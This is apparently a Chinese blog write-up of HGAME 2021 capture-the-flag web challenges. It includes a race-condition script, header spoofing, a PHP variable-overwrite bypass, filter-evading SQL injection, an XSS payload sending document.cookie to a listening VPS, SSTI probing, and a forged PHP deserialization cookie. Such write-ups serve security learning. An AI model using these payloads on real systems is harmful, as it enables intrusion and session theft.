hgame-2021

Posted on

hgame2021

week1-智商检测鸡

定积分爬虫计算(py2一直算不出来,py3才算出来)脚本如下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
#! /usr/bin/python3
# -*- coding: utf-8 -*-
import requests
import re
#{"question":"<math><mrow><msubsup><mo>\u222b</mo><mrow>
#<mo>-</mo><mn>92</mn></mrow><mrow><mn>31</mn></mrow>
#</msubsup><mo>(</mo><mn>12</mn><mi>x</mi><mo>+</mo><mn>17</mn>
#<mo>)</mo><mtext><mi>d</mi></mtext><mi>x</mi><mtd/></mrow></math>"}

session = requests.session()
url1 = 'http://r4u.top:5000/api/getQuestion'
url2 = 'http://r4u.top:5000/api/verify'
cookie = {'session':'eyJzb2x2aW5nIjowfQ.YCO0Rg.GB0csnF1HSr6v9-rMHaA9O72POI'}

i = 0
while i <103:
	html1 = requests.get(url1,cookies=cookie).text
	x2 = int(re.findall(r'<mn>(.*?)</mn>',html1)[0])*-1
	x1 = int(re.findall(r'<mn>(.*?)</mn>',html1)[1])
	a = int(re.findall(r'<mn>(.*?)</mn>',html1)[2])
	b = int(re.findall(r'<mn>(.*?)</mn>',html1)[3])
	answer = a/2*x1*x1+b*x1-a/2*x2*x2-b*x2
	answer = round(answer, 3)
	#print(answer)
	data = {"answer": answer}
	#print(data)
	r1 = requests.post(url2,json=data,cookies=cookie)
	#print(r1.content)
	cookie = requests.utils.dict_from_cookiejar(r1.cookies)
	status = requests.get('http://r4u.top:5000/api/getStatus',cookies=cookie).text
	print(status)
	#print(cookie)
	i += 1

也可用F12控制台进行

1
document.getElementsByTagName("button")[0].onclick = function(){ var r = document.getElementById("integral").querySelectorAll("mn"); var l = -parseFloat(r[0].innerHTML); var u = parseFloat(r[1].innerHTML); var a = parseFloat(r[2].innerHTML); var b = parseFloat(r[3].innerHTML); document.getElementById("answer").value = (a*(u*u-l*l)/2+b*(u- l)).toString(); submit(); };

最终

hgame{3very0ne_H4tes_Math}

week1-Hitchhiking_in_the_Galaxy

使用GET访问/HitchhikerGuide.php返回

1
2
3
4
5
6
7
8
9
10
11
<html>
<head><title>405 Method Not Allowed</title></head>
<body bgcolor="white">
<center>
    <h1>405 Not Allowed</h1>
    <p>顺风车不是这么搭的</p>
</center>
<hr>
<center>nginx/1.14.0 (Ubuntu)</center>
</body>
</html>

改为POST返回

1
只有使用"无限非概率引擎"(Infinite Improbability Drive)才能访问这里~

UA改为

1
User-Agent: Infinite Improbability Drive

返回

1
你知道吗?<a href="https://github.com/wuhan005">茄子</a>特别要求:你得从他的<a href="https://cardinal.ink/">Cardinal</a>过来

继续改Referer

1
2
Referer: https://cardinal.ink/
//flag仅能通过本地访问获得

加上

1
X-Forwarded-For:127.0.0.1

hgame{s3Cret_0f_HitCHhiking_in_the_GAl@xy_i5_dOnT_p@nic!}

最终

1
2
3
4
5
6
7
8
9
POST /HitchhikerGuide.php HTTP/1.1
Host: hitchhiker42.0727.site:42420
Upgrade-Insecure-Requests: 1
X-Forwarded-For:127.0.0.1
User-Agent: Infinite Improbability Drive
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: https://cardinal.ink/
Accept-Language: zh-CN,zh;q=0.9
Connection: close

week2-Liki的生日礼物

兑换界面存在条件竞争,参考脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
# -*- coding: utf-8 -*- 
import threading 
import requests 
url = 'https://birthday.liki.link' 
headers = { 'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8', 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36 Edg/88.0.705.63', 'Cookie': 'PHPSESSID=10vh4i8m7tg5as1028budrfvot'}

def buy(): 
	data = {'amount': 1} 
	requests.post(url=url + '/API/?m=buy', headers=headers, data=data) 

def multithreading(): 
	threads = [] 
	for t in range(52): 
		t = threading.Thread(target=buy)
		t.start() 
		threads.append(t) 
	for thread in threads: 
		thread.join() 

if __name__ == '__main__': 
	multithreading()

Liki非常开心并把flag给了你:hgame{L0ck_1s_TH3_S0lllut!on!!!}

week2-LazyDogR4U

源码在www.zip

1
2
3
4
5
6
7
8
9
10
11
www
├── Config.php--配置定义
├── User.php--判断用户登录
├── config.ini--没什么用
├── flag.php--如下
├── index.php--符合config里定义的用户即可进入flag.php
├── lazy.php--如下
└── static
    └── style.css

1 directory, 7 files

这里重点看flag.php

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
<?php
session_start();

require_once 'lazy.php';


if(!isset($_SESSION['username'])){
    die('您配吗?');
}
?>
<?php

    if($_SESSION['username'] === 'admin'){
        echo "<h3 style='color: white'>admin将于今日获取自己忠实的flag</h3>";
        echo "<h3 style='color: white'>$flag</h3>";
    }else{
        if($submit == "getflag"){
            echo "<h3 style='color: white'>{$_SESSION['username']}接近了问题的终点</h3>";
        }else{
            echo "<h3 style='color: white'>篡位者占领了神圣的页面</h3>";
        }
    }
        ?>

只判断admin即可进行获取flag,这里看lazy.php

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
<?php
$filter = ["SESSION", "SEVER", "COOKIE", "GLOBALS"];

// 直接注册所有变量,这样我就能少打字力,芜湖~

foreach(array('_GET','_POST') as $_request){
    foreach ($$_request as $_k => $_v){
        foreach ($filter as $youBadBad){
            $_k = str_replace($youBadBad, '', $_k);
        }
        ${$_k} = $_v;
    }
}


// 自动加载类,这样我也能少打字力,芜湖~
function auto($class_name){
    require_once $class_name . ".php";
}
spl_autoload_register('auto');

看到可以进行变量覆盖,通过_GET,_POST进行输入变量,如_SESSION1=admin,经过处理后变成_1=admin,这里我们双写绕过,然后通过覆盖变量方式$_SESSION['username']改为adminpayload如下

1
url?_SESSSESSIONION[username]=admin

hgame{R4U_|$-A-l4zY~DoG}

week2-200OK!!

status字段引起response变化

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
GET /server.php HTTP/1.1
Host: 200ok.liki.link
Connection: close
Status: 4
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.182 Safari/537.36
sec-ch-ua: "Chromium";v="88", "Google Chrome";v="88", ";Not A Brand";v="99"
Accept: */*
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://200ok.liki.link/
Accept-Language: zh-CN,zh;q=0.9

HTTP/1.1 200 OK
Content-Length: 18
Content-Type: text/html; charset=UTF-8
Date: Sun, 21 Feb 2021 09:52:08 GMT
Server: Caddy
Server: Apache/2.4.29 (Ubuntu)
Connection: close

HTTP 403 Forbidden

* * * * * * * * * * * *

Status: 2

HTTP/1.1 200 OK
Content-Length: 20
Content-Type: text/html; charset=UTF-8
Date: Sun, 21 Feb 2021 09:52:33 GMT
Server: Caddy
Server: Apache/2.4.29 (Ubuntu)
Connection: close

HTTP 400 Bad Request

可能有注入,测试过滤字符串有

['select', 'SELECT', 'from', 'FROM', 'union', 'UNION', 'where', 'WHERE', ' ']
大写可绕

1
2
3
4
5
6
7
8
9
10
11
12
13
-1'/***/uniOn/***/seLect/***/group_concat(table_name)/***/frOm/***/information_schema.tables/***/whEre/***/table_schema='week2sqli'#

//f1111111144444444444g,status


-1'/***/uniOn/***/seLect/***/group_concat(column_name)/***/frOm/***/information_schema.columns/**/whEre/**/table_name='f1111111144444444444g'#

//ffffff14gggggg


-1'/***/uniOn/***/seLect/***/ffffff14gggggg/***/frOm/***/f1111111144444444444g#

//hgame{Con9raTu1ati0n5+yoU_FXXK~Up-tH3,5Q1!!=)}

hgame{Con9raTu1ati0n5+yoU_FXXK~Up-tH3,5Q1!!=)}

week2-Post to zuckonit

xss,输入的script脚本会逆序输出,并且过滤了http,script等字段,http链接可以用//进行替换,同样可以进行访问,并用img标签插入,并利用逆序字符串事先将字段逆序,从而引发xss漏洞,通过本地监听端口获取admintoken

1
2
3
<img src=x onerror="alert(1)">
返回
>")1(trela"=rorreon x=crs gmi<

本地监听

1
nc -lk 8091

最终

1
2
3
>")eikooc.tnemucod+'/1908:spv//'(nepo.wodniw"=rorreno 'x'=crs gmi<on
反过来也就是
  no<img src='x' onerror="window.open('//vps:8091/'+document.cookie)">

获取token

1
2
3
4
5
6
7
8
9
GET /token=f7c30a3a5d9263d8c44476259ff7873764a1be04a9a45df8f92ae6b77b155acf HTTP/1.1
Host: url:8091
Connection: keep-alive
Upgrade-Insecure-Requests: 1
User-Agent: "WaterFox"
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://159.75.113.183:7654/checker?contents[]=on%3Cimg%20src%3D%27x%27%20onerror%3D%22window.open%28%27//url%3A8091/%27%2Bdocument.cookie%29%22%3E&contents[]=on%3Cimg%20src%3D%27x%27%20onerror%3D%22window.open%28%27//url%3A8091/%27%2Bdocument.cookie%29%22%3E&contents[]=on%3Cimg%20src%3D%27x%27%20onerror%3D%22window.open%28%27//url%3A8091/%27%2Bdocument.cookie%29%22%3E&
Accept-Encoding: gzip, deflate
Accept-Language: en-US

使用token访问/flag获取

1
2
3
GET /flag HTTP/1.1
Host: zuckonit.0727.site:7654
Cookie: token=f7c30a3a5d9263d8c44476259ff7873764a1be04a9a45df8f92ae6b77b155acf; session=a72bdd50-c3e4-4c0f-b6fd-9e578824ca75

hgame{X5s_t0GEt@dm1n’s_cOokies.}

week3-Forgetful

注册登录进去以后有个todolist功能,通关添加标题提交后可预览。插入之前的script语句发现有回显

1
<img src='x' //url:8091'+document.cookie)">

结合题意可知应该是python-ssti
尝试

1
2
3
Hello {{7*7}}	
返回
当前Todo: Hello 49

回显基类

参考链接Flask-SSTI注意事项以及一些POC
最终构成

但是此时返回

1
Stop!!!

尝试逆向tac也会返回stop,尝试nc到服务器也没反应,最终编码输出

aGdhbWV7aDB3XzRib3U3K0wzYXJuIW5nflB5dGhPbl5Ob3c/fQo=

hgame{h0w_4bou7+L3arn!ng~PythOn^Now?}

week3-Arknights

题目有git泄露源码

1
2
3
4
5
6
7
8
9
├── index.php
├── pool.php--数据池
├── simulator.php--主要处理文件
├── static
│   ├── css
│   │   ├── bootstrap.min.css
│   │   └── cover.css
│   └── img
│       └── bg.jpg

分析重要文件simulator.php代码如下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
<?php
class CardsPool
{

    private $file = '';

    public function __construct($filePath)
    {
        if (file_exists($filePath)) {
            $this->file = $filePath;
        } else {
            die("Cards pool file doesn't exist!");
        }
    }

    public function __toString(){
        return file_get_contents($this->file);
    }
}
class Eeeeeeevallllllll{
    public $msg="坏坏liki到此一游";

    public function __destruct()
    {
        echo $this->msg;
    }
}
class Session{

    private $sessionData;

    const SECRET_KEY = "7tH1PKviC9ncELTA1fPysf6NYq7z7IA9";

    public function __construct(){}

    public function set($key, $value){
        if(empty($key)){
            $this->sessionData[] = $value;
        }else{
            $this->sessionData[$key] = $value;
        }
    }

    public function getAll(){
        return $this->sessionData;
    }


    public function save(){

        $serialized = serialize($this->sessionData);
        $sign = base64_encode(md5($serialized . self::SECRET_KEY));
        $value = base64_encode($serialized) . "." . $sign;
        setcookie("session",$value);
    }


    public function extract($session){

        $sess_array = explode(".", $session);
        $data = base64_decode($sess_array[0]);
        $sign = base64_decode($sess_array[1]);

        if($sign === md5($data . self::SECRET_KEY)){
            $this->sessionData = unserialize($data);
        }else{
            unset($this->sessionData);
            die("Go away! You hacker!");
        }
    }
}

此处可以看到,我们的可控字段session的加解密流程,通过构造Eeeeeeevallllllll类,使__destruct方法里的echo触发CardsPool类的__toString方法,形成文件读,从而获取flag,且SECRET_KEY也已经给了。

参考链接PHP反序列化漏洞总结
最后构成poc如下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
<?php
class CardsPool
{

    private $file = '';

    public function __construct($filePath)
    {
        if (file_exists($filePath)) {
            $this->file = $filePath;
        } else {
            die("Cards pool file doesn't exist!");
        }
    }

    public function __toString(){
        return file_get_contents($this->file);
    }
}
class Eeeeeeevallllllll{
    public $msg="坏坏liki到此一游";

    public function __destruct()
    {
        echo $this->msg;
    }
}

$SECRET_KEY = "7tH1PKviC9ncELTA1fPysf6NYq7z7IA9";
$a = new Eeeeeeevallllllll();
$b = new CardsPool('./flag.php');
$a->msg = $b;
$serialized = serialize($a);
$sign = base64_encode(md5($serialized . $SECRET_KEY));
$value = base64_encode($serialized) . "." . $sign;
echo $value;
?>

返回payload

1
TzoxNzoiRWVlZWVlZXZhbGxsbGxsbGwiOjE6e3M6MzoibXNnIjtPOjk6IkNhcmRzUG9vbCI6MTp7czoxNToiAENhcmRzUG9vbABmaWxlIjtzOjEwOiIuL2ZsYWcucGhwIjt9fQ==.NjhlZTBkNGQyMTM4ZjNmYWU3ZDI2Y2QzYWQ1OTFkZWQ=

payload更改cookie获得

hgame{XI-4Nd-n!AN-D0e5Nt_eX|5T~4t_ALL}

-------------本文结束 感谢阅读-------------